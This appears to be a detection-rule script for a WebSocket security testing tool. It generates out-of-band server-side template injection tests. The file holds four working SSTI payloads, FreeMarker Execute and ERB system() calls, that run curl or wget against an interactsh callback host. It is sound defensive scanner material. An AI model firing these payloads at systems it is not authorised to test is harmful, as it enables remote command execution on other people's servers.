from com.mitmws.mvc.model import InteractShTestPayload
from com.mitmws.anomalydetection import DetectionRuleSelfTestStatus
from com.mitmws.anomalydetection import DetectedAnomaly
from java.util import ArrayList

def getName():
    return "Interactsh OOB tests for SSTI"
    
def getActiveRuleType():
    return "PAYLOAD-INTERACTSH"

def getDescription():
    return "If an interactsh server is available SSTI tests will be generated using a trackable id"

def getCategory():
    return "SSRF"
    
def getFrameScope():
  return ["TEXT","PING","PONG","CLOSE","BINARY","CONTINUATION"]

def getTestScope():
  return "PRESENTATION-WS"

def getOOBPayloads( interactsh ):
    payloads = []
    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<#assign ex=\"freemarker.template.utility.Execute\"?new()>$\{ex(\"curl " + payload + "\")\}",payload))

    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<%= system(\"curl " + payload + "\") %>",payload))

    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<#assign ex=\"freemarker.template.utility.Execute\"?new()> $\{ ex(\"wget " + payload + "\") \}",payload))

    payload = interactsh.getPayload();
    payloads.append(InteractShTestPayload("<%= system(\"wget " + payload + "\") %>",payload))

    return payloads
  
def analyze( websocket_messages ):
    anomalies = ArrayList()
    return anomalies

def selfTest():
    result = DetectionRuleSelfTestStatus()
    result.setSelfTestOK(True)
    return result
